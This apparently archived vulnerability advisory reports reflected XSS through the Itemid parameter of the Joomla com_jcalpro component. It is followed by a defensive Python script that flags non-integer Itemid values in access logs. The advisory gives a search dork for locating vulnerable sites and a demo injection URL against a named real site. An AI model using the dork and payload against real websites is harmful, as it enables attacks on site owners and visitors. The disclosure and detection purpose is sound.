
Joomla Component com_jcalpro XSS

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla Component com_jcalpro XSS</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>
[x] Joomla Component com_jcalpro
[x] Date: 17/07/2016
[x] Dork: inurl:index.php?option=com_jcalpro "itemid"
[x] Author: howucan
[x] Contact: howucan.gr@gmail.com
[x] Website: http://howucan.gr
[x] Software link: http://extensions.joomla.org/extension/jcal-pro
[x] Bug: XSS on Component com_jcalpro
[x]
[x] Example: http://www.site.com/index.php?option=com_jcalpro&Itemid=[XSS]
[x]
[x] Demo: http://www.ekasth.gr/index.php?option=com_jcalpro&Itemid=80%22%3E%3Ch1%3EXSS3D%20By%20howucan%3C/h1%3E&action=edit
[x] The "Itemid" parameter is not sanitized, so an XSS vector injected in the URL is reflected on the page.
</BODY></HTML>
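
A defender-side check for the issue described above, added here as an example (not code from the advisory or from JCal Pro): it scans web-server access logs for com_jcalpro requests whose Itemid is not a plain integer. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Joomla menu item ids are integers; an empty value is harmless.
_ITEMID_OK = re.compile(r"\d*")
# Request line inside a combined-format access log entry (assumed format).
_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jul/2016:10:01:02 +0000] '
    '"GET /index.php?option=com_jcalpro&Itemid=80 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Jul/2016:10:02:10 +0000] '
    '"GET /index.php?option=com_jcalpro&Itemid=80%22%3E%3Ch1%3Etest%3C/h1%3E'
    '&action=edit HTTP/1.1" 200 5301',
    '203.0.113.9 - - [17/Jul/2016:10:03:44 +0000] '
    '"GET /index.php?option=com_content&Itemid=abc HTTP/1.1" 200 100',
]


def bad_itemids(url):
    """Return the decoded non-integer Itemid values of a com_jcalpro URL."""
    params = {}
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for key, values in query.items():
        # Match parameter names case-insensitively to stay conservative.
        params.setdefault(key.lower(), []).extend(values)
    if "com_jcalpro" not in params.get("option", []):
        return []
    return [v for v in params.get("itemid", []) if not _ITEMID_OK.fullmatch(v)]


def suspicious_requests(log_lines):
    """Return (line_number, bad_values) for every flagged log entry."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = _REQUEST.search(line)
        if match:
            bad = bad_itemids(match.group(1))
            if bad:
                hits.append((number, bad))
    return hits


if __name__ == "__main__":
    for number, values in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: non-integer Itemid {values!r}")
```

The same integer-only rule is the input-side mitigation: a component that casts Itemid to an integer before echoing it back has nothing left to reflect.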

 
